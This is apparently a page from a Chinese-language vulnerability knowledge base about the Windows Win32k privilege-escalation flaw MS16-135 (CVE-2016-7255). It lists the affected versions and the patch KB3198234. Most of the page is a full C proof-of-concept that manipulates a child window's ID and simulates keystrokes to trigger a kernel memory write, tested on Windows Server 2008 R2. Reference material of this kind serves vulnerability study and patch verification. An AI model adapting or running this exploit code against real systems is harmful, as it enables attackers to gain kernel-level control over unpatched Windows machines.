3.7.5 ms16-135

漏洞名称

Win32k 特权提升漏洞(MS16-135)(CVE-2016-7255)

漏洞等级

高危

漏洞描述

如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows 内核模式驱动程序处理内存中对象的方式来解决这些漏洞。

漏洞影响

Windows Server2008 R2 SP1,SP2,Windows 7 SP1,Windows 8.1,Windows Server 2012gold和R2,RT的Windows 8.1,Windows 10,1511,和1607,Windows Server 2016

漏洞复现

poc脚本:

#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>


#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")

#undef DbgPrint
ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
    CHAR* pszDbgBuff = NULL;
    va_list VaList=NULL;
    ULONG ulRet = 0;

    do 
    {
        pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));
        if (NULL == pszDbgBuff)
        {
            break;
        }
        RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));

        va_start(VaList,Format);

        _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);

        DbgPrintEx(77 , 0 , pszDbgBuff );
        OutputDebugStringA(pszDbgBuff);

        va_end(VaList);

    } while (FALSE);

    if (NULL != pszDbgBuff)
    {
        HeapFree( GetProcessHeap(), 0 , pszDbgBuff );
        pszDbgBuff = NULL;
    }

    return ulRet;
}


 int _sim_key_down(WORD wKey)
 {
     INPUT stInput = {0};

     do 
     {
         stInput.type = INPUT_KEYBOARD;
         stInput.ki.wVk = wKey;
         stInput.ki.dwFlags = 0;

         SendInput(1 , &stInput , sizeof(stInput) );

     } while (FALSE);

     return 0;
}

 int _sim_key_up(WORD wKey)
 {
     INPUT stInput = {0};

     do 
     {
         stInput.type = INPUT_KEYBOARD;
         stInput.ki.wVk = wKey;
         stInput.ki.dwFlags = KEYEVENTF_KEYUP;

         SendInput(1 , &stInput , sizeof(stInput) );

     } while (FALSE);

     return 0;
}

 int _sim_alt_shift_esc()
 {
     int i = 0;

     do 
     {
         _sim_key_down( VK_MENU );
         _sim_key_down( VK_SHIFT );  


        _sim_key_down( VK_ESCAPE);
        _sim_key_up( VK_ESCAPE);

        _sim_key_down( VK_ESCAPE);
        _sim_key_up( VK_ESCAPE);

         _sim_key_up( VK_MENU );
         _sim_key_up( VK_SHIFT );        


     } while (FALSE);

     return 0;
}



 int _sim_alt_shift_tab(int nCount)
 {
     int i = 0;
     HWND hWnd = NULL;


     int nFinalRet = -1;

     do 
     {
         _sim_key_down( VK_MENU );
         _sim_key_down( VK_SHIFT );  


         for ( i = 0; i < nCount ; i++)
         {
             _sim_key_down( VK_TAB);
             _sim_key_up( VK_TAB);

             Sleep(1000);

         }


        _sim_key_up( VK_MENU );
         _sim_key_up( VK_SHIFT );    
     } while (FALSE);

     return nFinalRet;
}



int or_address_value_4(__in void* pAddress)
{
    WNDCLASSEXW stWC = {0};

    HWND    hWndParent = NULL;
    HWND    hWndChild = NULL;

    WCHAR*  pszClassName = L"cve-2016-7255";
    WCHAR*  pszTitleName = L"cve-2016-7255";

    void*   pId = NULL;
    MSG     stMsg = {0};

    do 
    {

        stWC.cbSize = sizeof(stWC);
        stWC.lpfnWndProc = DefWindowProcW;
        stWC.lpszClassName = pszClassName;

        if ( 0 == RegisterClassExW(&stWC) )
        {
            break;
        }

        hWndParent = CreateWindowExW(
            0,
            pszClassName,
            NULL,
            WS_OVERLAPPEDWINDOW|WS_VISIBLE,
            0,
            0,
            360,
            360,
            NULL,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );

        if (NULL == hWndParent)
        {
            break;
        }

        hWndChild = CreateWindowExW(
            0,
            pszClassName,
            pszTitleName,
            WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,
            0,
            0,
            160,
            160,
            hWndParent,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );

        if (NULL == hWndChild)
        {
            break;
        }

        #ifdef _WIN64
            pId = ( (UCHAR*)pAddress - 0x28 ); 
        #else
            pId = ( (UCHAR*)pAddress - 0x14); 
        #endif // #ifdef _WIN64

        SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );

        DbgPrint("hWndChild = 0x%p\n" , hWndChild);
        DebugBreak();

        ShowWindow(hWndParent , SW_SHOWNORMAL);

        SetParent(hWndChild , GetDesktopWindow() );

        SetForegroundWindow(hWndChild);

        _sim_alt_shift_tab(4);

        SwitchToThisWindow(hWndChild , TRUE);

        _sim_alt_shift_esc();


        while( GetMessage(&stMsg , NULL , 0 , 0) )
        {   
            TranslateMessage(&stMsg);
            DispatchMessage(&stMsg);
        }


    } while (FALSE);

    if ( NULL != hWndParent )
    {
        DestroyWindow(hWndParent);
        hWndParent = NULL;
    }

    if ( NULL != hWndChild )
    {
        DestroyWindow(hWndChild);
        hWndChild = NULL;
    }

    UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );

    return 0;
}

int __cdecl wmain(int nArgc, WCHAR** Argv)
{
    do 
    {
        or_address_value_4( (void*)0xFFFFFFFF );
    } while (FALSE);

    return 0;
}

提权

测试环境:windows server 2008 r2

漏洞修复

补丁号:KB3198234

Previous3.7.4 CVE-2017-0213Next3.7.6 CVE-2018-8120

Last updated

Was this helpful?